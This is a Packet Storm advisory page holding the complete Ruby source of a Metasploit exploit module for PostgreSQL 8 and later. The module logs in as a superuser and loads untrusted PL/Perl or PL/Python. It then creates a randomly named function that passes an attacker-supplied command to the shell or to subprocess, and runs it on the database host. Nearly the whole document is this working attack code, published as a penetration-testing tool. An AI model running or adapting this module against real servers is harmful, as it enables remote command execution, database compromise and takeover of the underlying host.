PostgreSQL CREATE LANGUAGE Execution

2016-04-09T00:00:00
ID PACKETSTORM:136633
Type packetstorm
Reporter Micheal Cottingham
Modified 2016-04-09T00:00:00

Description

                                        
                                            `##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'msf/core/exploit/postgres'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::Remote::Postgres  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Report  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'PostgreSQL CREATE LANGUAGE Execution',  
'Description' => %q(  
Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages.  
Most commonly this is Perl and Python. When enabled, command execution is possible on the host.  
To execute system commands, loading the "untrusted" version of the language is necessary.  
This requires a superuser. This is usually postgres. The execution should be platform-agnostic,  
and has been tested on OS X, Windows, and Linux.  
  
This module attempts to load Perl or Python to execute system commands. As this dynamically loads  
a scripting language to execute commands, it is not necessary to drop a file on the filesystem.  
  
Only Postgres 8 and up are supported.  
),  
'Author' => [  
'Micheal Cottingham', # author of this module  
'midnitesnake', # the postgres_payload module that this is based on,  
'Nixawk' # Improves the module  
],  
'License' => MSF_LICENSE,  
'References' => [  
['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'],  
['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'],  
['URL', 'http://www.postgresql.org/docs/current/static/plpython.html']  
],  
'Platform' => %w(linux unix win osx),  
'Payload' => {  
'PayloadType' => %w(cmd)  
},  
'Arch' => [ARCH_CMD],  
'Targets' => [  
['Automatic', {}]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Jan 1 2016'))  
  
deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')  
end  
  
def postgres_major_version(version)  
version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)  
version_match['major_version']  
end  
  
def check  
if vuln_version?  
Exploit::CheckCode::Appears  
else  
Exploit::CheckCode::Safe  
end  
end  
  
def vuln_version?  
version = postgres_fingerprint  
if version[:auth]  
major_version = postgres_major_version(version[:auth])  
return true if major_version && major_version.to_i >= 8  
end  
false  
end  
  
def login_success?  
status = do_login(username, password, database)  
case status  
when :noauth  
print_error "#{peer} - Authentication failed"  
return false  
when :noconn  
print_error "#{peer} - Connection failed"  
return false  
else  
print_status "#{peer} - #{status}"  
return true  
end  
end  
  
def load_extension?(language)  
case load_procedural_language(language, 'LANGUAGE')  
when :exists  
print_good "#{peer} - #{language} is already loaded, continuing"  
return true  
when :loaded  
print_good "#{peer} - #{language} was successfully loaded, continuing"  
return true  
when :not_exists  
print_status "#{peer} - #{language} could not be loaded"  
return false  
else  
print_error "#{peer} - error occurred loading #{language}"  
return false  
end  
end  
  
def exec_function?(func_name)  
query = "SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')"  
select_query = postgres_query(query)  
  
case select_query.keys[0]  
when :conn_error  
print_error "#{peer} - Connection error"  
return false  
when :sql_error  
print_error "#{peer} - Exploit failed"  
return false  
when :complete  
print_good "#{peer} - Exploit successful"  
return true  
else  
print_error "#{peer} - Unknown"  
return false  
end  
end  
  
def create_function?(language, func_name)  
load_func = ''  
  
case language  
when 'perl'  
query = "CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$"  
query << "`$_[0]`;"  
query << "$$ LANGUAGE pl#{language}u"  
load_func = postgres_query(query)  
when /^python(?:2|3)?/i  
query = "CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r"  
query << "import subprocess, shlex\rsubprocess.check_output(shlex.split(c))\r"  
query << "$$ LANGUAGE pl#{language}u"  
load_func = postgres_query(query)  
end  
  
case load_func.keys[0]  
when :conn_error  
print_error "#{peer} - Connection error"  
return false  
when :sql_error  
print_error "#{peer} Exploit failed"  
return false  
when :complete  
print_good "#{peer} - Loaded UDF (exec_#{func_name})"  
return true  
else  
print_error "#{peer} - Unknown"  
return false  
end  
end  
  
def load_procedural_language(language, extension)  
query = "CREATE #{extension} pl#{language}u"  
load_language = postgres_query(query)  
return :loaded unless load_language.keys[0] == :sql_error  
  
match_exists = load_language[:sql_error].match(/(?:(extension|language) "pl#{language}u" already exists)/m)  
return :exists if match_exists  
  
match_error = load_language[:sql_error].match(/(?:could not (?:open extension control|access) file|unsupported language)/m)  
return :not_exists if match_error  
end  
  
def do_login(user, pass, database)  
begin  
password = pass || postgres_password  
result = postgres_fingerprint(  
db: database,  
username: user,  
password: password  
)  
  
return result[:auth] if result[:auth]  
print_status "#{peer} - Login failed"  
return :noauth  
  
rescue Rex::ConnectionError  
return :noconn  
end  
end  
  
def exploit  
return unless vuln_version?  
return unless login_success?  
  
languages = %w(perl python python2 python3)  
languages.each do |language|  
next unless load_extension?(language)  
func_name = Rex::Text.rand_text_alpha(10)  
next unless create_function?(language, func_name)  
if exec_function?(func_name)  
print_warning "Please clear extension [#{language}]: function [#{func_name}] manually"  
break  
end  
end  
postgres_logout if @postgres_conn  
end  
end  
`